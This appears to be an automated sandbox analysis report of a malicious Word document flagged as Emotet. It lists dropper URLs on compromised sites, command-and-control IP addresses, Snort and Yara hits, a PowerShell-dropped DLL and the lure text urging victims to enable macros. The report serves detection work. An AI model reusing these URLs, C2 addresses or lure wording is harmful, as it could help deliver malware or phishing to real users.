Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2139174857.0000000002380000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_002075F0 FindFirstFileW,

20_2_002075F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: zenithcampus.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49172 -> 167.71.148.58:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 35.200.206.198:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49169 -> 184.66.18.83:80
Source: Traffic	Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49172 -> 167.71.148.58:443

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: http://zenithcampus.com/l/yQ/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: http://hbprivileged.com/cgi-bin/kcggF/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: http://localaffordableroofer.com/ralphs-receipt-f2uhf/qTT5DC/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://johnhaydenwrites.com/track_url/P/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://nahlasolimandesigns.com/nahla3/d/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://football-eg.com/web_map/n/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://vietnhabienhoa.com/wordpress/QUTy/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /l/yQ/ HTTP/1.1Host: zenithcampus.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ralphs-receipt-f2uhf/qTT5DC/ HTTP/1.1Host: localaffordableroofer.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 167.71.148.58 167.71.148.58

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View	ASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_0020280B InternetReadFile,

20_2_0020280B

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD45F3-025D-4403-9DBE-B492A11253DC}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /l/yQ/ HTTP/1.1Host: zenithcampus.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ralphs-receipt-f2uhf/qTT5DC/ HTTP/1.1Host: localaffordableroofer.comConnection: Keep-Alive

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: zenithcampus.com

Source: unknown

Source: global traffic

Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: http://hbprivileged.com/cgi-bin/kcggF/
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: http://localaffordableroofer.com
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: http://localaffordableroofer.com/ralphs-receipt-f2uhf/qTT5DC/
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2139305270.0000000002470000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2143212470.0000000002770000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2144888495.0000000002780000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.2164826084.0000000002860000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2139305270.0000000002470000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2143212470.0000000002770000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2144888495.0000000002780000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.2164826084.0000000002860000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/cclea
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp	String found in binary or memory: http://zenithcampus.com
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: http://zenithcampus.com/l/yQ/
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://football-eg.com/web_map/n/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://johnhaydenwrites.com/track_url/P/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://nahlasolimandesigns.com/nahla3/d/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://vietnhabienhoa.com/wordpress/QUTy/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp	String found in binary or memory: https://vietnhabienhoa.com/wordpress/QUTy/P
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://zenithcampus.com/wp-json/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 0000000F.00000002.2153905031.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155916188.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150770541.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147679834.0000000000311000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162568948.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141920127.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2159102288.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2358984806.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155772363.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157336614.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143541090.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147601789.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150877098.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141994054.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162462473.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2149091905.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146032293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146169134.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2153961508.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152298877.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2158760347.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll

Jump to dropped file

Very long command line found

Source: unknown	Process created: Commandline size = 7696
Source: unknown	Process created: Commandline size = 7605
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7605	Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Contains functionality to delete services

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_004AF3A1 DeleteService,

12_2_004AF3A1

Creates files inside the system directory

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Yozs\

Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100135DE	7_2_100135DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019081	7_2_10019081
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C0D0	7_2_1000C0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C228	7_2_1000C228
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000BA3C	7_2_1000BA3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001A30D	7_2_1001A30D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CB34	7_2_1000CB34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019B65	7_2_10019B65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000EB85	7_2_1000EB85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D39E	7_2_1000D39E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E3E0	7_2_1000E3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B4F3	7_2_1001B4F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100195F3	7_2_100195F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C71C	7_2_1000C71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CF69	7_2_1000CF69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A6005	7_2_001A6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B1079	7_2_001B1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AE871	7_2_001AE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B0065	7_2_001B0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B1913	7_2_001B1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A510E	7_2_001A510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B5136	7_2_001B5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A415F	7_2_001A415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B41AD	7_2_001B41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A2A18	7_2_001A2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A0A00	7_2_001A0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B2A00	7_2_001B2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B8279	7_2_001B8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001ACA68	7_2_001ACA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A6A6F	7_2_001A6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A628A	7_2_001A628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001C12B6	7_2_001C12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B02A0	7_2_001B02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B6AD5	7_2_001B6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AD2C9	7_2_001AD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A8B16	7_2_001A8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AFB05	7_2_001AFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A8355	7_2_001A8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B4B48	7_2_001B4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A1B46	7_2_001A1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B2B45	7_2_001B2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AE380	7_2_001AE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AF3B5	7_2_001AF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A33AB	7_2_001A33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A5BAC	7_2_001A5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AABF8	7_2_001AABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B9BE4	7_2_001B9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A3C28	7_2_001A3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A7C4A	7_2_001A7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AC44B	7_2_001AC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B4460	7_2_001B4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AE499	7_2_001AE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B9494	7_2_001B9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BC48F	7_2_001BC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001ABCA5	7_2_001ABCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B5CCB	7_2_001B5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AA4E1	7_2_001AA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A6D2C	7_2_001A6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A3521	7_2_001A3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001ADD24	7_2_001ADD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BBD5E	7_2_001BBD5E
